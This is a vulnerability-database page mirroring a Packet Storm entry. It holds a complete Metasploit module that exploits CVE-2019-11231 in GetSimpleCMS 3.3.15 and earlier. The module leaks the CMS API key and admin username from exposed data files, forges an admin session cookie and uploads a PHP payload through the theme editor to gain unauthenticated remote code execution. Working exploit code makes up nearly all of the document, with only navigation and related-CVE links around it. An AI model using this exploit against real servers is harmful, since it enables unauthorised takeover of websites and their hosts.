Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormTruerand0mPACKETSTORM:152961
HistoryMay 16, 2019 - 12:00 a.m.

GetSimpleCMS 3.3.15 Remote Code Execution

2019-05-1600:00:00
truerand0m
packetstormsecurity.com
77

0.492 Medium

EPSS

Percentile

97.5%

JSON
`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::HttpClient  
  
def initialize(info={})  
super(update_info(info,  
'Name' => "GetSimpleCMS Unauthenticated RCE",  
'Description' => %q{  
This module exploits a vulnerability found in GetSimpleCMS,  
which allows unauthenticated attackers to perform Remote Code Execution.  
An arbitrary file upload (PHPcode for example) vulnerability can be triggered by an authenticated user,  
however authentication can be bypassed by leaking the cms API key to target the session manager.  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'truerand0m' # Discovery, exploit and Metasploit from Khalifazo,incite_team  
],  
'References' =>  
[  
['CVE', '2019-11231'],  
['URL', 'https://ssd-disclosure.com/archives/3899/ssd-advisory-getcms-unauthenticated-remote-code-execution'],  
],  
'Payload' =>  
{  
'BadChars' => "\x00"  
},  
'DefaultOptions' =>  
{  
'EXITFUNC' => 'thread'  
},  
'Platform' => 'php',  
'Arch' => ARCH_PHP,  
'Targets' =>  
[  
['GetSimpleCMS 3.3.15 and before', {}]  
],  
'Privileged' => false,  
'DisclosureDate' => "Apr 28 2019",  
'DefaultTarget' => 0))  
  
register_options(  
[  
OptString.new('TARGETURI', [true, 'The base path to the cms', '/'])  
])  
end  
  
def gscms_version  
res = send_request_cgi(  
'method' => 'GET',  
'uri' => normalize_uri(target_uri.path, 'admin', '/')  
)  
return unless res && res.code == 200  
  
generator = res.get_html_document.at(  
'//script[@type = "text/javascript"]/@src'  
)  
  
fail_with(Failure::NotFound, 'Failed to retrieve generator') unless generator  
vers = generator.value.split('?v=').last.gsub(".","")  
return unless vers  
@version = vers  
end  
  
def get_salt  
uri = normalize_uri(target_uri.path, 'data', 'other', 'authorization.xml')  
res = send_request_cgi(  
'method' => 'GET',  
'uri' => uri  
)  
return unless res && res.code == 200  
  
fail_with(Failure::NotFound, 'Failed to retrieve salt') if res.get_xml_document.at('apikey').nil?  
@salt = res.get_xml_document.at('apikey').text  
end  
  
def get_user  
uri = normalize_uri(target_uri.path, 'data', 'users' ,'/')  
res = send_request_cgi(  
'method' => 'GET',  
'uri' => uri  
)  
return unless res && res.code == 200  
  
fail_with(Failure::NotFound, 'Failed to retrieve username') if res.get_html_document.at('[text()*="xml"]').nil?  
@username = res.get_html_document.at('[text()*="xml"]').text.split('.xml').first  
end  
  
def gen_cookie(version,salt,username)  
cookie_name = "getsimple_cookie_#{version}"  
sha_salt_usr = Digest::SHA1.hexdigest("#{username}#{salt}")  
  
sha_salt_cookie = Digest::SHA1.hexdigest("#{cookie_name}#{salt}")  
@cookie = "GS_ADMIN_USERNAME=#{username};#{sha_salt_cookie}=#{sha_salt_usr}"  
end  
def get_nonce(cookie)  
res = send_request_cgi({  
'method' => 'GET',  
'uri' => normalize_uri(target_uri,'admin','theme-edit.php'),  
'cookie' => cookie,  
'vars_get' => {  
't' => 'Innovation',  
'f' => 'Default Template',  
's' => 'Edit'  
}  
})  
  
fail_with(Failure::NotFound, 'Failed to retrieve nonce') if res.get_html_document.at('//input[@id = "nonce"]/@value').nil?  
@nonce = res.get_html_document.at('//input[@id = "nonce"]/@value')  
end  
  
def exploit  
unless check == CheckCode::Vulnerable  
fail_with(Failure::NotVulnerable, 'It appears that the target is not vulnerable')  
end  
version = gscms_version  
salt = get_salt  
username = get_user  
cookie = gen_cookie(version,salt,username)  
nonce = get_nonce(cookie)  
  
fname = "#{rand_text_alpha(6..16)}.php"  
php = %Q|<?php #{payload.encoded} ?>|  
upload_file(cookie,nonce,fname,php)  
send_request_cgi({  
'method' => 'GET',  
'uri' => normalize_uri(target_uri.path,'theme',fname),  
})  
end  
  
def check  
version = gscms_version  
unless version  
return CheckCode::Safe  
end  
vprint_status "GetSimpleCMS version #{version}"  
unless vulnerable  
return CheckCode::Detected  
end  
CheckCode::Vulnerable  
end  
  
def vulnerable  
uri = normalize_uri(target_uri.path, 'data', 'other', 'authorization.xml')  
res = send_request_cgi(  
'method' => 'GET',  
'uri' => uri  
)  
return unless res && res.code == 200  
  
uri = normalize_uri(target_uri.path, 'data', 'users', '/')  
res = send_request_cgi(  
'method' => 'GET',  
'uri' => uri  
)  
return unless res && res.code == 200  
return true  
end  
  
def upload_file(cookie,nonce,fname,content)  
res = send_request_cgi({  
'method' => 'POST',  
'uri' => normalize_uri(target_uri.path,'admin','theme-edit.php'),  
'cookie' => cookie,  
'vars_post' => {  
'submitsave' => 2,  
'edited_file' => fname,  
'content' => content,  
'nonce' => nonce  
}  
})  
end  
end  
`

Related

cvelist 1
nvd 1
openvas 1
prion 1
osv 1
cve 1
zdt 1
cvelist
cvelist
CVE-2019-11231
2019-05-22 17:05:50
nvd
nvd
CVE-2019-11231
2019-05-22 18:29:00
openvas
openvas
GetSimple CMS <= 3.3.16 RCE Vulnerability
2019-07-09 00:00:00
prion
prion
Path traversal
2019-05-22 18:29:00
osv
osv
CVE-2019-11231
2019-05-22 18:29:00
cve
cve
CVE-2019-11231
2019-05-22 18:29:00
zdt
zdt
GetSimpleCMS - Unauthenticated Remote Code Execution Exploit
2019-05-20 00:00:00

0.492 Medium

EPSS

Percentile

97.5%

JSON
Related for PACKETSTORM:152961
cvelist1nvd1openvas1prion1osv1cve1zdt1